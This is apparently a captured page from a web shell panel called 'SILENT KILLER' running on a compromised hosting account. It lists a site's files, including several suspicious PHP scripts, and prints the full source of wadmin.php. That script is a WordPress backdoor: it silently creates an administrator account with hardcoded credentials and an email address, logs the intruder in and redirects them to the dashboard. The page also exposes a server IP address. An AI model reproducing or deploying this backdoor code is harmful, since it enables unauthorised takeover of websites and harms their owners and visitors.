SILENT KILLERPanel

Current Path: > home > codekrsu > techflix.lk


Operation   : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Software     : Apache
Server IP    : 162.0.232.56 | Your IP: 216.73.216.111
Domains      : 1034 Domain(s)
Permission   : [ 0750 ]

Files and Folders in: /home/codekrsu/techflix.lk

NameTypeSizeLast ModifiedActions
.well-known Directory - -
087d4691 Directory - -
382838 Directory - -
cgi-bin Directory - -
.hcflag File 31 bytes July 25 2025 07:35:06.
.htaccess.bk File 1037 bytes September 12 2024 05:38:52.
.litespeed_flag File 297 bytes July 28 2025 01:32:44.
.ptr File 4360 bytes July 30 2025 13:38:28.
720.php File 1230 bytes July 20 2025 13:41:55.
Textarea.php File 1435 bytes July 08 2025 12:56:08.
close_class.php File 784 bytes July 09 2025 18:59:29.
cmd2.php File 10884 bytes July 22 2025 07:08:53.
css.zip File 1675 bytes July 21 2025 03:22:15.
cust.utf8.php File 1236 bytes July 09 2025 19:00:52.
db_structure.php File 3410 bytes June 25 2025 14:54:09.
error_log File 1256431 bytes August 02 2025 19:09:18.
fact_aprove.php File 979 bytes July 09 2025 19:02:09.
includest.php File 675 bytes June 16 2025 15:02:48.
mainfile.dist.php File 0 bytes June 17 2025 04:06:56.
observable.php File 1435 bytes August 02 2025 08:04:23.
prayer.f.php File 1835 bytes June 16 2025 15:02:48.
prayer_intentions.php File 11005 bytes July 15 2025 07:37:03.
project.f.php File 2918 bytes July 09 2025 19:07:36.
set.php File 647 bytes July 20 2025 21:37:08.
wadmin.php File 1957 bytes July 20 2025 20:29:38.

Reading File: /home/codekrsu/techflix.lk/wadmin.php

<?php
ob_start();

function find_wp_load() {
    $dir = dirname(__FILE__);
    $max_depth = 10;
    for ($i = 0; $i < $max_depth; $i++) {
        $path = $dir . str_repeat('/..', $i) . '/wp-load.php';
        if (file_exists($path)) {
            return realpath($path);
        }
    }
    $extra = [
        $dir . '/wp/wp-load.php',
        $dir . '/wordpress/wp-load.php',
        $dir . '/blog/wp-load.php'
    ];
    foreach ($extra as $path) {
        if (file_exists($path)) {
            return realpath($path);
        }
    }
    return false;
}

$wp_load_path = find_wp_load();
if ($wp_load_path) {
    require_once($wp_load_path);
    
    // ====== USER CONFIGURATION ====== //
    $new_username = 'websiteowner';      // Set your username
    $new_password = 'Str0ngP@ss!';       // Set your password
    $new_email    = 'jasonnardinis@gmail.com'; // Set your email
    // ================================ //

    // Check if user already exists
    if (!username_exists($new_username) && !email_exists($new_email)) {
        // Create new user
        $user_id = wp_create_user($new_username, $new_password, $new_email);
        
        if (!is_wp_error($user_id)) {
            // Assign administrator role
            $user = new WP_User($user_id);
            $user->set_role('administrator');
            
            // Auto-login the new user
            wp_set_current_user($user_id, $new_username);
            wp_set_auth_cookie($user_id);
            do_action('wp_login', $new_username, $user);
            
            // Redirect to admin dashboard
            header("Location: " . admin_url());
            exit;
        } else {
            echo "User creation failed: " . $user_id->get_error_message();
        }
    } else {
        echo "User with this username or email already exists.";
    }
} else {
    echo "WordPress not detected.";
}

ob_end_flush();

SILENT KILLER Tool